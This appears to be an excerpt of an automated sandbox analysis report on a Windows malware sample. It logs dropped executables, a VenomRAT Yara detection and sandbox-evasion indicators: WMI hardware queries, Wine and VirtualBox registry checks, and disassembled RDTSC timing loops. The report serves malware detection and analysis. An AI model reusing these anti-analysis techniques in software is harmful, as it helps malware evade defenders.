Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected VenomRAT

Source: Yara match	File source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\random.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96347

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: EDF41A second address: EDF41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: EDF41E second address: EDEC9A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3FE11BFDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 jmp 00007F3FE11BFDD4h 0x00000018 popad 0x00000019 nop 0x0000001a jmp 00007F3FE11BFDCAh 0x0000001f push dword ptr [ebp+122D1051h] 0x00000025 jmp 00007F3FE11BFDD0h 0x0000002a call dword ptr [ebp+122D262Eh] 0x00000030 pushad 0x00000031 jno 00007F3FE11BFDDCh 0x00000037 xor eax, eax 0x00000039 or dword ptr [ebp+122D2451h], ecx 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 pushad 0x00000044 or dword ptr [ebp+122D2451h], eax 0x0000004a jmp 00007F3FE11BFDD4h 0x0000004f popad 0x00000050 mov dword ptr [ebp+122D3B87h], eax 0x00000056 js 00007F3FE11BFDD6h 0x0000005c mov esi, 0000003Ch 0x00000061 jmp 00007F3FE11BFDCAh 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a mov dword ptr [ebp+122D24A9h], ecx 0x00000070 sub dword ptr [ebp+122D2451h], ecx 0x00000076 lodsw 0x00000078 jmp 00007F3FE11BFDCAh 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 stc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 clc 0x00000087 nop 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007F3FE11BFDD2h 0x0000008f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 103F19A second address: 103F19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 103F19E second address: 103F1A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B3DA second address: 104B3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E60h 0x00000009 jc 00007F3FE0C24E56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B3F6 second address: 104B3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B3FB second address: 104B413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3FE0C24E61h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B55B second address: 104B565 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FE11BFDD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B565 second address: 104B56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B56B second address: 104B5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3FE11BFDCCh 0x0000000a jne 00007F3FE11BFDC6h 0x00000010 jbe 00007F3FE11BFDC6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jmp 00007F3FE11BFDD0h 0x0000001f pushad 0x00000020 jmp 00007F3FE11BFDCDh 0x00000025 pushad 0x00000026 popad 0x00000027 je 00007F3FE11BFDC6h 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B5B7 second address: 104B5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B5BB second address: 104B5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104B5BF second address: 104B5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3FE0C24E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D0BE second address: 104D0C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D0C4 second address: 104D105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jg 00007F3FE0C24E5Ch 0x00000012 push 00000000h 0x00000014 jno 00007F3FE0C24E56h 0x0000001a call 00007F3FE0C24E59h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D105 second address: 104D109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D109 second address: 104D153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3FE0C24E66h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F3FE0C24E69h 0x00000018 ja 00007F3FE0C24E56h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D153 second address: 104D168 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F3FE11BFDC6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D168 second address: 104D16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D16C second address: 104D197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F3FE11BFDC8h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F3FE11BFDD0h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D197 second address: 104D24F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F3FE0C24E56h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f mov edi, 649C03D1h 0x00000014 mov dword ptr [ebp+122D22FEh], esi 0x0000001a push 00000003h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F3FE0C24E58h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov esi, dword ptr [ebp+122D37C4h] 0x0000003c mov edi, dword ptr [ebp+122D3863h] 0x00000042 push 00000000h 0x00000044 add esi, dword ptr [ebp+122D2461h] 0x0000004a mov esi, 33668462h 0x0000004f push 00000003h 0x00000051 pushad 0x00000052 push esi 0x00000053 stc 0x00000054 pop ebx 0x00000055 popad 0x00000056 call 00007F3FE0C24E59h 0x0000005b jmp 00007F3FE0C24E5Ah 0x00000060 push eax 0x00000061 jl 00007F3FE0C24E60h 0x00000067 pushad 0x00000068 push ecx 0x00000069 pop ecx 0x0000006a js 00007F3FE0C24E56h 0x00000070 popad 0x00000071 mov eax, dword ptr [esp+04h] 0x00000075 jns 00007F3FE0C24E70h 0x0000007b mov eax, dword ptr [eax] 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007F3FE0C24E5Fh 0x00000084 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D24F second address: 104D2C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d js 00007F3FE11BFDD1h 0x00000013 jmp 00007F3FE11BFDCBh 0x00000018 pop eax 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F3FE11BFDC8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov ch, 22h 0x00000035 mov edx, dword ptr [ebp+122D393Fh] 0x0000003b lea ebx, dword ptr [ebp+12441FA1h] 0x00000041 mov dword ptr [ebp+122D19EDh], edi 0x00000047 xchg eax, ebx 0x00000048 jmp 00007F3FE11BFDCBh 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D2FC second address: 104D300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D300 second address: 104D329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F3FE11BFDC6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D329 second address: 104D32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D32D second address: 104D333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D333 second address: 104D377 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FE0C24E5Ch 0x00000008 jnl 00007F3FE0C24E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov cx, BA41h 0x00000015 call 00007F3FE0C24E65h 0x0000001a mov ecx, dword ptr [ebp+122D3933h] 0x00000020 pop ecx 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 mov edx, dword ptr [ebp+122D38FFh] 0x0000002a pop ecx 0x0000002b push AF38698Fh 0x00000030 pushad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D4AA second address: 104D516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F3FE11BFDC8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov edx, dword ptr [ebp+122D3907h] 0x00000018 push 00000000h 0x0000001a jmp 00007F3FE11BFDCFh 0x0000001f call 00007F3FE11BFDC9h 0x00000024 jmp 00007F3FE11BFDD3h 0x00000029 push eax 0x0000002a jmp 00007F3FE11BFDD6h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 pushad 0x00000034 jng 00007F3FE11BFDC8h 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
